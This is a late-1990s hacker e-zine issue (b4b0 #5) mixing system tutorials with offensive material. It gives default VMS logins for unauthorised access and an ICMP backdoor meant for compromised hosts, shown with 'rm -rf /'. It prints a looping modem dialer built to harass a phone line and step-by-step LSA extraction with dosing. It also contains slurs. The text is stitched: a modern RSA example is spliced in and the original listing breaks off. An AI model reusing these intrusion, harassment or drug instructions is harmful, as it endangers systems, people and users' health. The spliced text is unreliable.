VVVVVVVVVVV VVVVVVVVVVV VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV VVVVVVVVVV VVVVVVVVVV VVVVVVVVVV VVVVVVVVVV . $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a, $$' VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P"' `"Y8, . yxxx.$$.xxxxxxxxxxxx ,d$"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg $ P' $$,d$$Yba, ,d$" d $$ $$,d$$Yba, 88 ,$.$$$ $ $ ' $$P' ,`$$a ,d$" ``" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ bxxx.$$$, '`,d$".xxxxxxxx.$$.x.$$b, ',a$$".x`8ba,,aad$$'.xxxxd. . s$Y"Y$bd$P',yas.VVVV s$$z $Y"Y$$$P"' "Y$$$$(headflux)$ VVVVVVVV VVVVVVVV VVVVVVVV VVVVVVVV vVVVVVVV VVVVVVVV VV[ ISSUE: 5 ]VV VVVVVVVVVVVVVV VVVVVVVVVVVV VVVVVVVVVV VVVVVVVV VVVVVV VVVV VV b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! THIS ISSUE OF B4B0 BROUGHT TO U BY THE LETTERS: E, L, and by the number 8. b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! >> b4b0 [V] << ------- -\ table of contentz \- 0x00 - The usual crap / note from editor - Qytpo (and the g4ng) 0x01 - A brief introduction to VMS - gr1p 0x02 - A Demonstration of RSA public key encryption algorithm -ohday 0x03 - Motorola emx2500 switching doqz (see motorola.txt) 0x04 - Bar Coding VS Magnetic Stripe Technology - Qytpo 0x05 - Neat ICMP backdoor - chrak 0x06 - Introduction to AS/400 Computing [Part - 1] - tymat 0x07 - LSA Synthesis - ph1xation (i found it intriguing...) 0x08 - ghettodial.c - Qytpo (tiz humorously stimulating.) 0x09 - High Level UNIX Socket Functions - presonic (see tcpip.tgz) 0x0A - erase.c - chrak (neat.) 0x0B - Commonly Written Network Functions for Linux/Glibc -banana 0x0C - TCP/IP TIC TAC TOE - r4lph (see nttt.c) 0x0D - This issues' Postal Madness (dedicated to our pal JP.) 0x0E - b4b0 headl1nes.. -Qytpo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !! SPECIAL BONUS WAREZ ISSUE !! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ( see subdirectory appendix/ ) Appendix A: joystick library, itz pretty neat. 
-ohday Appendix B: shellbin.c (emailed submission from 'cheddar') Appendix C: smoothcolor.c (baldor and giemor - itz rad.) b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 -\ the people of b4b0 \- position name --------- ---- editor of this issue : Qytpo : editor of last issue : jsbach : grand master whacked : ge0rge : canadian moose hunter : r4lph : admin de b4b0 : tip : offical b4b0 g00k : tymat : pissed-off-and-lovin-it : segv : witty : ohday : gone as far as we know : gr1p : missing in action : lore : pissed off black man : shaki : bovine warrior : the milk : eskimo boy : presoniq : crocidile dundee : duke : can't speak english : flex : -\ fact of the month -\ ----------------------- - there is a city in Mexico, close to the US border called "juarez" -\ url of the month -\ ---------------------- - http://members.xoom.com/yaro/macos/unload.htm (use java capable browzer) -\ most inferior site of the month -\ ------------------------------------- - http://www.antionline.com -\ most elite lib of the decade (*cough*) -\ --------------------------------------------- libclear-1.00.tgz (sunsite.unc.edu/pub/Linux/libs/libclear-1.00.tgz) #include clear(void) { (void)system("clear"); } clear_version(void) { (void)clear(); (void)system("echo Libclear version 1.00 by Michael Freeman\n"); (void)system("echo Press Control-D to continue\n"); (void)system("cat"); (void)clear(); } *** the readme file continues to show this lib's eliteness: LIBCLEAR -- VERSION 1.00 (i will fear 2.00 even more, maybe he will use a path in his system() call.) Ever wanted to be able to clear the screen in a regular unix program without having to call a system("clear"); ? Well now you can! Just link your proggies with this librarie and you can do clear very easily! Imagine just doing clear()... And thats it! Libclear is not freeware however. If you like libclear, you are encouraged to send $5 to me. You can reach my email address at mikef@alexis.prism.net. 
Any comments about this? Just direct them to me! mikef@alexis.prism.net! Send any bug reports to mikef@alexis.prism.net!!! \=) -Michael Freeman (el8 innovations) *cough* *** and the INSTALL for this is even more funny: Installing this is really EASY!!! Just type mae! :-) (mae? elite.) That will compile libclear and make a test program that uses it! You can run the test program once it's compiled by typing libcleartest!! If you have any questions, please send them to mikef@alexis.prism.net! *caugh caugh* # mae bash: mae: command not found # NOW WHAT THE FUCK DO I DO? bash: NOW: command not found -\ the neat \- -------------- oral sex, shroomz, chopin, hallucinogen, aphex twin, crystal method, lsd, **girls who give head for conf info**, see previous thing, see previous thing, see previous thing, see previous thing, bill clinton, rainbow bright, the smurfs, my size barbie doll (ud be amazed what u can do with thoze things.), nofx, vibrators that plug into a wall outlet, coffee, coffee, and more coffee. -\ the jewish \- ---------------- anyone who does, or knows anyone who gets on any irc network. oh. and the guy who wrote that libclear crap. -------------------------------------------------------------------------- 0x00 - Note from the editor -------------------------------------------------------------------------- Well, on schedule as always, here is issue 5. it iz packed with lots of great reading material, lotz of great educational code, and even an article on how to make your 0wn drugs. IT CANT GET MUCH MORE DIVERSE THAN THAT BABY. As you all know, we have decided to take turns as the editor for this magazine. I have made some changes myself, as I didn't like the first few issues containing *WAY* too *MANY* IRC logs, and *WAY* too *LITTLE* stimulating reading material, I made the difficult *caugh* decision of doing away with them. As for issue 4, well, we decided not to distribute it. It was far too elite for anyone besides JP to handle. 
We are going to attempt setting a deadline of about 1 issue a month, to meet the demands of our extremely anticipating readers. We now have www.b4b0.org up for your viewing amusement! All the issues are posted on this site, and you can read them while there, or you can download the b4b0.tgz archives. If you read them online, you obviously won't be gifted with the presence of the files included in the full archive. If you have any articles, or mail you wish to send: we always appreciate submissions from people on the internet. a special piq 0n the afr0 to srpato, efpee, gemmi, and any0ne else wh0 chillz with us that i may have missed. WE LOVE U GUYZ.

  submissions@b4b0.org - article submissions
  letters@b4b0.org     - letters to staff

have fun kidz.

-Qytpo (optik@inficad.com)

--------------------------------------------------------------------------
0x01 - a brief intro to VMS
--------------------------------------------------------------------------

People have been asking quite a few questions about VMS/OpenVMS recently. They are finding that some machines on university subnets are running OpenVMS and they don't have any experience with this operating system; hopefully this short guide will help a few people along and give them some introductory knowledge of VMS.

VMS/OpenVMS is a multi-tasking, multi-processing virtual memory operating system, VMS standing for Virtual Memory System. It is designed to handle memory extensions beyond the capabilities of its processor (VAX - Virtual Address eXtension). This allows it to run software and programs much larger than its physical memory and processor speed would otherwise permit. VMS also runs on the ALPHA platform, which uses the Advanced RISC Architecture and provides similar power to a VAX, but the ALPHA allows more flexibility and is slightly more technologically advanced than the VAX in that it also supports installation of unix-based operating systems as well as VMS.
The differences between running VMS on a VAX or an ALPHA platform are very small, as most programs can just be recompiled and run to suit whichever architecture VMS is running on. The float types and data alignment techniques on VAX and ALPHA are slightly different, but close enough to coexist coherently without causing any compilation problems during installation.

VMS was first developed in 1976 by DEC (Digital Equipment Corporation) as part of their new 32-bit virtual memory operating systems project. It has since been supported by many academic institutions and large financial companies due to its large power capabilities. It uses a command line scripting language called DCL (Digital Command Language) along with compilers for other more well-known programming languages such as Pascal, COBOL, Ada, Fortran, C, BASIC etc.

VMS is a very secure operating system internally, but it does often, by default, have some easy to access default logins (similar to how IRIX often has unpassworded lp accounts etc.). Some default logins on VMS include.. guest/guest guest/ operator/operator system/system system/manager system/operator support/support decnet/decnet field/field default/default operations/operations

When entering a VMS system you will receive a login prompt/message similar to this..

-=-=-
Username: GUEST
Password:

Welcome to OpenVMS VAX V6.2
Last interactive login on Monday, 14-SEP-1998 20:09
Last non-interactive login on Tuesday, 15-SEP-1998 14:43
There are new messages in folder BLAH.
-=-=-

You are then presented with a prompt looking like this..

$

.x BASIC VMS COMMANDS x.

Below is a list of some basic commands that you will need to know to navigate your way around a VMS system from the command line prompt comfortably..

HELP
  If in doubt, there is always the help screen.
  $ help
  This is large and offers detailed help on MANY commands which are not covered here.

LOGOUT
  Logs the user out of the system.
EDIT
  This brings up the VMS editor (which uses a VT-220 terminal).

ACCOUNTING
  Accounting is the program that keeps logs of the usage users are making of the system.

@
  This executes a DCL command procedure, eg.
  $ @elitedcl.com
  This is just the same as running a unix style shell script at the command line, or even a dos .exe/.com file at the dos command line.

DEL
  Deletes a file on the system, eg.
  $ del file.dat

RUN
  This will run an executable file.
  $ run elite.exe

DIR
  Lists the contents of a directory. There are two widely used options that you should know here.
  /brief - gives a brief listing of the directory, similar to ls
  /full  - gives a full listing of the directory, similar to ls -al but gives pages of information rather than a little permissions/size chart..

SHOW
  The show command has quite a few options and can provide a lot of information about the system that you are on. The command must be followed by an option, and some options include..
  users   - shows all online users at the current time.
  time    - shows the current local time of the system.
  system  - presents you with system information.
  memory  - shows you the memory the machine is using/running.
  network - displays network information to which the VMS is connected.
  process - process information, similar to the unix ps command.
  devices - list of devices attached to the system.
  quota   - disk quota of current user.

TYPE
  This command will display a file at the terminal; it is the same as the unix cat command.
  $ type

MAIL
  This will send mail to any machine connected to any shared network or to another local user on the system.

SET FILE/PROTECTION
  This command sets permissions of files, similar to the unix chmod command, however it has different levels of permissions than standard unix permissions. The most common permission for a regular user's file is..
  $ set file/protection=owner[rwed] leet.dat
  This sets the permission of leet.dat to read (r), write (w), edit (e), delete (d) permission of the user who owns the file. ie.
owner

  Other possible permissions include..
  world  - this (in place of owner) would make the file world (rwed?)
  group  - this would give permission to people in the same user group
  system - this would give permission to all users with system access.
  eg.
  $ set file/protection=world[r] leet.dat
  Would result in leet.dat being world readable.

PHONE
  Phone is a VMS chat program similar to the unix talk program. Type
  $ phone
  and your prompt will change from a $ to a %. At this point type the username of the person you wish to chat with; you can see if they are online by typing 'show users' beforehand.
  % guest
  would then start a talk session between yourself and the person logged in as guest.

$PASSWORD
  This would change the password of the user you are logged in as. eg.
  $ $password fuqy0u
  Would result in your new password being fuqy0u.

CREATE
  Create is the pascal compiler that is used to compile .pas files.
  $ create whatever.pas
  would then result in the production of an executable file from the .pas code.

.x FILE EXTENSIONS x.

Below is a list of common file extensions in a VMS environment; if I missed any common ones out I apologise..

  com - A DCL batch file.
  cld - A DCL descriptor file (much like a windoze .dll).
  dat - A general data file.
  exe - An executable file.
  lis - System directory listing file.
  dir - A directory/subdirectory file.
  tmp - A temporary storage file.
  txt - A simple text file, also used for outputted mail files.
  uaf - A user authorisation file.
  sys - A system image file.
  mai - A mail message file.
  edt - A command file for the VMS EDT editor.
  jou - EDT journal which logs any known problems.
  ada - Ada source code.
  bas - BASIC source code.
  c   - C source code.
  cob - COBOL source code.
  for - Fortran source code.
  pas - Pascal code.
  obj - The compiler creates object code before it links the source.

[ All examples within this text were demonstrated on an OpenVMS 6.2 system, which is a common VMS system found connected to academic networks today.
]

9x - Spreading H/P in the new millennium. http://www2.dope.org/9x

gr1p
gr1p@linenoise.org

--------------------------------------------------------------------------
0x02 - RSA Public Key Encryption algorithm demo.
--------------------------------------------------------------------------

//demonstration of the rsa public key encryption algorithm

/* the five header names were lost from this copy of the listing; these are
   the ones the surviving code needs */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int plaintext[] = { 0x42, 0x34, 0x42, 0x30, 0x20, 0x4c, 0x30, 0x56,
                    0x45, 0x5a, 0x20, 0x59, 0x30, 0x55, 0x21, 0x00 };

unsigned char primes[] = {
    2 , 3 , 5 , 7 , 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53,
    59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131,
    137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,
    211, 223, 227, 229, 233, 239, 241, 251 };

int isprime(short i) /* test any number less than 65536 */
{
    int j;

    if (i < 3) return 0;
    /* trial division by the small primes above; the loop header was mangled
       in this copy and is restored here */
    for (j = 0; j < sizeof(primes); j++) {
        if (i % primes[j] == 0) {
            if (primes[j] >= i) return 1;   /* i is itself one of the table primes */
            return 0;
        }
    }
    return 1;
}

int gcd (int a, int b)
{
    int i;

    i = a % b;
    if (i == 0) return b;
    return gcd(b, i);
}

int modexp(int a, int x, int n)
{
    /* 64-bit accumulators: with n up to 65535 the product r*a overflows an int */
    unsigned long long r = 1, base = a;

    while (x > 0) {
        if (x % 2 == 1) r = (r * base) % n;
        base = (base * base) % n;
        x /= 2;
    }
    return (int)r;
}

/* calculate e and d */
void calculate (int *ep, int *dp, int t, int p, int q)
{
    int e, d = 0;
    int n;

    for (e = 3 ; e

[ the remainder of ohday's listing (the rest of calculate() and main()) was lost in this copy of the issue ]

--------------------------------------------------------------------------
0x03 - Motorola EMX2500 dox.
--------------------------------------------------------------------------

Please see included file, mot.txt.gz

--------------------------------------------------------------------------
0x04 - Advantages and Disadvantages of Magnetic Stripe Tech.
--------------------------------------------------------------------------

Bar Coding VS Magnetic-Stripe Technology:

While there are many variations on a basic theme, magnetic-stripe recording is not really all that different from printing bar codes. In magnetic materials, there is a two-state choice of polarity, just as there is a two-state choice between either black or white in many printing processes.
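Added example for section 0x02 above (not ohday's code, whose listing is cut short in this copy): a complete textbook RSA round trip in C on the zine's own plaintext bytes. Key generation follows the shape the article's calculate() starts on, the smallest e >= 3 coprime to (p-1)(q-1), with d found by the extended Euclidean algorithm. The primes 61 and 53 used in main() are my own choice, not from the article, and all parameters are toy-sized; real deployments use 2048-bit moduli and padding (OAEP), and encrypting one byte at a time with no padding, as this demo and the original do, is a deterministic substitution that an attacker can invert with a 256-entry table, which is the practical lesson of the demo.

```c
#include <stdio.h>
#include <string.h>

/* Added example: textbook RSA on single bytes, for illustration only.
 * All arithmetic stays below 2^64 because the primes are tiny. */

typedef unsigned long long u64;

/* Modular exponentiation by repeated squaring (same idea as the zine's modexp). */
u64 modexp(u64 a, u64 x, u64 n)
{
    u64 r = 1;
    a %= n;
    while (x > 0) {
        if (x & 1) r = (r * a) % n;
        a = (a * a) % n;
        x >>= 1;
    }
    return r;
}

u64 gcd(u64 a, u64 b)
{
    while (b != 0) { u64 t = a % b; a = b; b = t; }
    return a;
}

/* Extended Euclid: returns d with (e*d) mod t == 1, or 0 if e has no inverse. */
u64 modinv(u64 e, u64 t)
{
    long long r0 = (long long)t, r1 = (long long)e, s0 = 0, s1 = 1;
    while (r1 != 0) {
        long long q = r0 / r1, tmp;
        tmp = r0 - q * r1; r0 = r1; r1 = tmp;
        tmp = s0 - q * s1; s0 = s1; s1 = tmp;
    }
    if (r0 != 1) return 0;
    return (u64)((s0 % (long long)t + (long long)t) % (long long)t);
}

/* Key generation from two primes p, q (assumed prime, not checked here):
 * n = p*q, t = (p-1)(q-1), e = smallest value >= 3 coprime to t, d = e^-1 mod t.
 * Returns 1 on success, 0 if no usable e exists. */
int rsa_keygen(u64 p, u64 q, u64 *n, u64 *e, u64 *d)
{
    u64 t = (p - 1) * (q - 1);
    *n = p * q;
    for (*e = 3; *e < t; (*e)++)
        if (gcd(*e, t) == 1) break;
    if (*e >= t) return 0;
    *d = modinv(*e, t);
    return *d != 0;
}

/* Apply c = m^exp mod n to every element; used for both encrypt (e) and decrypt (d).
 * Each symbol must be < n, which holds for bytes whenever n > 255. */
void rsa_apply(const u64 *in, u64 *out, size_t len, u64 exp, u64 n)
{
    size_t i;
    for (i = 0; i < len; i++) out[i] = modexp(in[i], exp, n);
}

/* Round-trips the zine's plaintext ("B4B0 L0VEZ Y0U!") through keys built from
 * p and q.  Returns 1 if decryption reproduces the plaintext and the ciphertext
 * actually differs from it, 0 otherwise. */
int rsa_roundtrip(u64 p, u64 q)
{
    static const u64 plaintext[] = { 0x42, 0x34, 0x42, 0x30, 0x20, 0x4c, 0x30, 0x56,
                                     0x45, 0x5a, 0x20, 0x59, 0x30, 0x55, 0x21 };
    size_t len = sizeof plaintext / sizeof plaintext[0], i;
    u64 n, e, d, cipher[16], plain[16];
    int differs = 0;

    if (!rsa_keygen(p, q, &n, &e, &d) || n <= 255) return 0;
    rsa_apply(plaintext, cipher, len, e, n);
    rsa_apply(cipher, plain, len, d, n);
    for (i = 0; i < len; i++) {
        if (plain[i] != plaintext[i]) return 0;
        if (cipher[i] != plaintext[i]) differs = 1;
    }
    return differs;
}

int main(void)
{
    u64 n, e, d;
    rsa_keygen(61, 53, &n, &e, &d);          /* toy primes, my choice */
    printf("n=%llu e=%llu d=%llu roundtrip=%d\n", n, e, d, rsa_roundtrip(61, 53));
    return 0;
}
```

With p=61, q=53 the keys come out as n=3233, e=7, d=1783, and rsa_roundtrip() returns 1; rsa_roundtrip(2, 3) returns 0 because (p-1)(q-1)=2 leaves no e >= 3 to choose.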
In fact, with magnetic recording there are "fences" of plus "pickets" structured against minus backgrounds (or vice versa), analogous to black bars on white backgrounds. In both circumstances information is delineated by the locations on recording media where there are either plus/minus flux or black/white color changes. Just as with bar codes, information is recovered from magnetic stripes by sweeping read heads across entire coded surfaces and converting positional information into pulse-width modulated voltages. As recovered voltages are exactly the same in both circumstances, there is no inherent first read rate or substitution error rate difference between the two technologies. Rather, these issues are functions of how well particular vendors design their instruments and what patterns of pickets they elect to use.

On the other hand, because magnetic materials are more homogeneous than most printing materials, information can be packed more densely on magnetic stripes than bar codes can be printed on conventional papers. While these higher packing densities are advantageous in some circumstances, they require the use of smaller wand tips. Rubbing on abrasive magnetic materials, these smaller wand tips will not last as long as the larger tip jewels used on some bar-code wands.

The sensing elements currently found inside magnetic wand tips have been designed around a number of different magnetic phenomena including the Hall Effect, the Magnetostrictive/Piezoelectric Effect, magnetic transistors, and one of the several magneto-resistances. At the present time, magneto-resistors appear to be simpler and less expensive than the alternatives and are most commonly used. In this application, magneto-resistors have a depth of field of about 0.007 inch. This means that, for all practical purposes, wand tips must be held in contact with magnetic stripes during read traverses.
Or at best, the magnetic stripes can be covered only with a very thin film of non-magnetic material.

As the coding density potential for magnetic stripes is superior to that of bar codes, magnetic stripes may well have an advantage in those applications where a great deal of information must be machine-read from data cards. Then too, where information stored on a card is subject to change (to updating), the magnetic stripe technique may well be the only practical answer. But these attributes have limited application to general manufacturing problems, and other traits inherent to magnetic recording are limiting. For instance, it is difficult to print magnetic stripe labels. Certainly the use of adhesive magnetic-stripe labels manually attached to multiple copies of documents is not a pragmatic solution to document identification systems. Further, magnetic stripes cannot be read from a distance, data destruction of magnetically encoded messages is not visible if it occurs, and magnetic stripes can easily be erased by an imposed magnetic field of very few gauss.

-----------------------
Magnetic Stripe Reading
-----------------------

Disadvantages:
  - expensive media
  - not human readable
  - modifiable
  - word processing incompatible
  - difficult to copy
  - restricted format
  - low print rate
  - cannot be read through plastic cover
  - not beam scannable

Advantages:
  - read-write capability
  - low error rate
  - non-critical wanding
  - full character set

----------------
Bar Code Reading
----------------

Advantages:
  - easy to print
  - easy to copy
  - word processing compatible
  - low error rate
  - non-critical wanding
  - full character set
  - inexpensive media
  - non-restricted format
  - inexpensive to read
  - high speed printable
  - material imprintable
  - beam scannable

Disadvantages:
  - low information density

- - - - - - - - - - - - - - - - - - - - -
-  Most information for this article    -
-  came directly from "The Handbook of  -
-  Bar Coding Systems" - Harry E.       -
-  Burke, under the aegis of the Data   -
-  Pathing Systems Division/NCR         -
-  Corporation. If you are interested   -
-  in this subject, i suggest this      -
-  as reading material.                 -
- - - - - - - - - - - - - - - - - - - - -

-Qytpo

--------------------------------------------------------------------------
0x05 - Neat ICMP backdoor
--------------------------------------------------------------------------

Please see included file, icmpbd-linux.tgz

the client attaches a string to the end of the icmp header, sets the ip src addr to 6.6.6.6 and icmp type to 8. the server, which should be running on a linux system, will exec the string that was attached by the client when it receives the icmp packet.

Just ./server on the rooted system. and to exec commands on it completely anonymously you can:

./client rm -rf /

or anything else. This is only one way though and you can not see the executed program's output.

-SHAKI/chrak

--------------------------------------------------------------------------
0x06 - AS/400 Information
--------------------------------------------------------------------------

Introduction to AS/400 Computing
Part 1 - Very Basic Concepts
tymat@b4b0.org

I. Key Features of the AS/400

AS/400 is a computer platform made by IBM that runs the OS/400 operating system. The three key features of the AS/400 are:

1) Integrated Applications - software components such as relational database programs, security software, internet applications, and the programming environment are part of the operating system.

2) High Availability - like most IBM computing systems (like AIX) the AS/400 is considered a high availability system, by which most major changes to the system do not require an IPL (Initial Program Load, or a reboot).

3) Multiprocessor - an AS/400 machine can have many different processors separate from the system processor, each responsible for a particular I/O device. Figure 1.1 shows a typical AS/400 configuration.
Figure 1.1

                ____________________
               |  System Processor  |      // New models of the AS/400 can have
               |____________________|      // up to 12 64bit processors
                         |
              ___________|______________
             |     System Main Bus      |
             |__________________________|
                  /               \
          _______|________   ______|_________
         |  I/O Interface  | |  I/O Interface  |
         |_________________| |_________________|
                 |                   |
          _______|_______     _______|_______
         |  SPD I/O Bus  |   |  PCI I/O Bus  |
         |_______________|   |_______________|
             /       \
      Devices......   Integrated PC Server
                        - Novell
                        - Lotus Domino
                        - Windows NT
                        - PC TCP/IP Stack      // This is independent of
                        - TCP/IP Firewall      // OS/400s own TCP/IP stack
                        - Proxy Server         // and vice-versa.
                        - Lotus Domino SMTP Mail

Other key features that make the AS/400 an attractive platform to many businesses are:

4) Single Level Storage Technology - Programs work with objects and object names, so hardware is always accessed by name and not by its address.

5) Large Address Size - With a 64bit addressing space, the AS/400 can address up to 18.4 quintillion bytes.

6) Fully Object Oriented - All system resources, such as data structures, are packaged within an object. This means that AS/400 instructions can only work on what they are supposed to work on, so data will never be treated as executable code.

7) Internet Ready - New AS/400 systems have full internet capabilities, which allows AS/400 machines to act as web servers (with full SSL capabilities).

8) Robust Programming Environment - OS/400 comes with several different programming environments such as CL (Control Language), ILE, COBOL, RPG III & IV, and Java II.

II. TCP/IP Connectivity

The AS/400 supports many different TCP/IP application protocols such as FTP, SMTP, Telnet, and network printing. The AS/400 has a complete implementation of the sockets API, all integrated into OS/400. The AS/400 supports many different network interfaces ranging from token ring, ethernet, x.25, frame relay, fiber distributed data interface, and serial.

III. File Structures

There are 10 different file structures which are divided into 5 main categories. Each file structure has a corresponding CRTxxxF command which is used to create these files. Figure 3.1 is a chart which summarizes these file types.

Figure 3.1

  File Type      Subtype  File Description                          Create Command
  -------------  -------  ----------------------------------------  --------------
  Database File  PF       Physical File                             CRTPF
                 LF       Logical File                              CRTLF
  Source File    PF       Physical Source File                      CRTSRCPF
  Device File    DSPF     Workstation Display File                  CRTDSPF
                 PRTF     Printer File                              CRTPRTF
                 TAPF     Tape File                                 CRTTAPF
                 DKTF     Diskette File                             CRTDKTF
                 ICFF     Intersystem Communications Function File  CRTICFF
  DDM File       DDMF     Distributed Data Management File          CRTDDMF
  Save File      SAVF     Save File                                 CRTSAVF

Ok, that's it for this issue. From now on there will be an AS/400 related article in every issue of B4B0 and each will depend on previous AS/400 articles released in this zine. The purpose of these beginner-level articles is to get the reader up to speed on AS/400 basics so that in the near future I will be able to discuss an overview of AS/400 security and probably base more in-depth lectures on AS/400 security and programming on these articles. It is quite sad, but 99% of B4B0 readers have no clue about AS/400 and if I started discussing advanced AS/400 topics it would only go to waste. Next issue we will tackle more about file structures and then I will start discussing more user-level related tasks such as maneuvering the OS/400 menu system and customizing commands.

--------------------------------------------------------------------------
0x07 - LSA Synthesis.
--------------------------------------------------------------------------

Phixation's guide to synthesizing Lysergic Acid Amide from MG seed'z

Introduction:

This article I have written is a run through on the cleanest most effective way in synthesizing LSA from Morning Glory Seeds. I suggest all Acid Heads read furthur, that is if you havent fried your brain to the core yet like some of us.
Believe me, having a fully functional brain could make such an insurmountable difference. Keep in mind we are going to be working woth Petroleum Ether (Naptha). In some cases it could be EXTREMELY deadly. 1. Equipment 2. Ingredients 3. Um.. freeze. kr0nfieldz (Note. You may want to go to the bottom detailed explanation on how the s eed/ethanol ratio goes so you know how much of what to add.) ------------------------------------------------------------------------------ Section 1. Before you pickup any of the chemicals/ingredients you need for this extraction it is a neccessity that you atleast have the following equipment, or something that is an equal substitute for any of the following that is required. 2 Jars with lids on them. (One for the pet ether, the other for the MG/Ethanol) 1 coffee filter or funnel (To filter the ether from the MG seeds) Coffee filters or filter paper (For use with funnel) coffee grinder (To grind the MG seeds) ------------------------------------------------------------------------------ Section 2. Most of the following is required, the other shit is dumped on your own personal preference. (Uhm.. freeze. Ingredients) Morning Glory Seeds, (1 seed = 1 microgram..) Petroleum Ether (In hardware stores you can find it as "Naptha") Any type of Ethanol liquid that will work for human ingestion. Any of the following will work: Bracardi 151, Segrums 7 50%, Vodka, Everclear, Basically just any beverage of 80 proof or better. ------------------------------------------------------------------------------ Section 3. (Uhm.. freeze! Cornfields in one hour! Be there or be square =) Try to take good precaution while doing this, although it is fairly safe. I could see some people gettting just a little bit carried away with the Pet Ether. Im sure inhaling it makes you feel splended.. at first, but as I said before! Its fatal! (*note* This document is assuming your using 500mg seeds.) 1. Wash MG seeds good in detergent and cold water... 2. 
Grind the MG seeds in the Coffee Grinder to the finest the powder will get. 3. Put the grinded seeds into one of your jars, and then add enough Pet ether (Naptha) to where the grinded seeds are just barely submerged beneath the Pet ether. 4. Put the lid tightly on the jar and shake rapidly for 20 minutes on and off. 5. Now remove the lid and pour the shit into the filter with the filter paper in place. (Note. If you want to be safe, do this outside. Otherwise the Naptha could dispute a rather hostile gas.) 6. You should now have the Pet ether in one of your jars, and the grinded seeds should be on the filter. 7. Let the seed powder dry out on a paper plate for a good 2/3 hours. 8. After the powder is dry, place it in the other jar. (This part could be quite crucial if not performed with the preffered ratio.) 9. Now add the desired amount of alchohol depending on the intensity you want to experience in your trippy journey. (Read below for details.) ------------------------------------------------------------------------------ (Uhm.. Freeze! Bucktooth.) If you are new to tripping, or are just scared of intense trips, I suggest using about 30-50 seeds every 1`oz of ethanol(alchohol). Per`se you wanted to make a 500 seed batch, then you would poor about 10oz of ethanol into the jar with the powdered MG seeds. If you are cool with your average intense trip with some neat hallucinations, but mild to an extent, use 1`oz per every 250 seeds. Which in this case you probably used 500 seeds, so put 2oz of alchohol in the jar with the powdered mg seeds. (If you want stronger, figure it out. Im sure you understand how the delution ration works) ------------------------------------------------------------------------------ 10. After you have mixed your desired amount of alchohol with the seed powder, shake the jar quite frequently on and off for about 3 days. 11. All of the LSA should be deluted in with the ethanol by now. 
Use your filter one more time, and filter the ethanol from the seeds. 12. Throw the seeds away and preciously glance at your cup of acid. 13. If you made it using 500 seeds, and 2oz of ethanol, drink half of it. 15 seconds later you should feel quite odd. The response this type of acid is almost instantanious due to the fact that the LSA is deluted with ethanol, and ethanol hits your mucus membraine and goes strait to your brain. If you used 10oz of ethanol then there should be about 50 micrograms per ounce. Split your cup of the liquid into 1/10 and take a 1/10. If you want stronger affects take a bit more. Conclusion: Hrm.. well thats about it. Just hoped you payed attention to my little tips that I put in here and there. And uhm.. w0rd to all yew buckt00th raz0rcats..yew f00lz are da fuqin sickmade. Um.. ph33r da bucktooth. Phixation.. -------------------------------------------------------------------------- 0x08 - GhettoDial.c - Qytpo -------------------------------------------------------------------------- /* Qytpo - 1998 */ /* */ /* merely for your amusement. nothing special, or technically superior */ /* use it to get out of exams. ANI your favorite classroom line. */ /* etc etc. */ #include #include #include #include #include #include #include #include #include #define MODEM "/dev/cua1" /* yer modem port.. of course */ /* /dev/modem if yer not sure.. */ #define DIALSTRING "ATDT5551212\r" /* number to dial..put *62 in */ /* front if you want to call */ /* anonymously, depending on your */ /* phone company. */ #define INTERVAL 10 /* the time between calls */ int main(int argc, char *argv[]) { int fd; int ret; printf("\n%s - Qytpo\n", argv[0]); printf("\nEach [.] 
represents a call.\n"); printf("\nNumber to dial: %s", DIALSTRING); printf("\n\nDialing: "); fflush(stdout); while(1) { fd = open(MODEM, O_RDWR | O_NOCTTY | O_NDELAY); if(fd == -1) { perror("open();\n"); printf("Unable to open comport: %s\n", MODEM); exit(-1); } ret = write(fd, "ATZ\r", 4); if(ret == -1) { perror("write();\n"); printf("Unable to initialize modem\n"); exit(-1); } sleep(2); ret = write(fd, DIALSTRING, strlen(DIALSTRING)); if(ret == -1) { perror("write();\n"); printf("Unable to dial number\n"); exit(-1); } sleep(INTERVAL); ret = write(fd, "ATH\r", 4); if(ret == -1) { perror("write();"); printf("Unable to hang up modem.\n"); exit(-1); } close(fd); fprintf(stdout, "."); fflush(stdout); } close(fd); exit(0); } -------------------------------------------------------------------------- 0x09 - High Level UNIX Socket Functions - presonic -------------------------------------------------------------------------- High Level Unix Socket Functions (v0.2) jjohnson@eagle.ptialaska.net | presonic@irc (See tcpip.tgz) This is the second release. Changes include readline() and some new features in i_nslookup. This version also includes the http_ver.c example, and subscan has been updated. God knows why I made two different versions of subscan. I couldn't decide which one was better, so I included them both. I plan to actually start working on this as one of my main projects, so lots of shit should be implimented in the next release. Thanks to seyon for lending me his fbsd box. Tested on: * linux 2.0.* (slackware/redhat) * freebsd 2.2.7 (please note that the subscan examples will not work properly in any bsd variant due to its design. http_ver, however, works great.) Shit planned for future releases: * high level icmp sending/receiving * high level udp sending/receiving * high level raw icmp/udp/tcp * high level tcp server/daemon functions * multi-platform abilities These functions can be used to learn how to use socket functions, or to avoid learning them. 
That part has been left to you. Both subscan and http_ver are examples of how to use the socket functions. subscan uses advanced non-blocking I/O and select(), so it may be hard to follow for neophytes.

You may use these in your program however you please. All I ask is that you drop me an e-mail to tell me what you're using it for. See tcpip.c for more details.

Files:
 README            you're fat.
 Makefile          type 'make' and see.
 tcpip.c           *the* socket functions.
 subscan.log.c     a scanner that sweeps a subnet for a given port.
                   (appends the scan to a log file, stdout is closed)
